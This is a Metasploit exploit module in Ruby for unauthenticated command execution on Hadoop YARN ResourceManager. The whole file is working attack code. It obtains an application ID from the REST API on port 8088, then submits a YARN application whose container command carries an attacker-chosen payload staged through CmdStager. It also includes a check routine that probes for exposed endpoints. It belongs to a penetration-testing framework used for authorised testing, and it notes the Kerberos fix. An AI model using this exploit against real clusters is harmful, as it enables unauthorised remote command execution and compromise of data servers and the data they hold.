metasploit-gs/modules/exploits/linux/http/hadoop_unauth_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
        'Description' => %q{
          This module uses Hadoop's standard ResourceManager REST API to execute arbitrary commands on an unsecured Hadoop server.
          Hadoop administrators should enable Kerberos authentication for these endpoints by changing the 'hadoop.security.authentication' setting in 'core-site.xml' from 'simple' (the default) to 'kerberos' before exposing the node to the network.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'cbmixx', # Proof of concept
          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
        ],
        'References' => [
          ['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
          ['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn'],
          # Note, there will never be a CVE for this issue, since this is a misconfiguration by the administrator rather than a vulnerability in the software.
          # Hadoop installations should always configure Kerberos authentication before being exposed to the network,
          # since the default configuration does not require authentication.
          ['URL', 'https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html']
        ],
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          ['Automatic', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2016-10-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(8088)])
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
        'method' => 'POST'
      )
    rescue Rex::ConnectionError
      vprint_error("#{peer} - Connection failed")
      return CheckCode::Unknown('Could not determine the target status')
    end

    if res && res.code == 200 && res.body.include?('application-id')
      return CheckCode::Appears('The target appears to be vulnerable')
    end

    CheckCode::Safe('The target is not vulnerable')
  end

  def exploit
    print_status('Sending Command')
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
      'method' => 'POST'
    )

    unless res && res.code == 200 && res.body.include?('application-id')
      fail_with(Failure::NotFound, 'Could not retrieve application-id')
    end

    app_id = res.get_json_document['application-id']

    post = {
      'application-id' => app_id,
      'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
      'application-type' => 'YARN',
      'am-container-spec' => {
        'commands' => { 'command' => cmd.to_s }
      }
    }

    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
      'method' => 'POST',
      'ctype' => 'application/json',
      'data' => post.to_json
    )
  end

end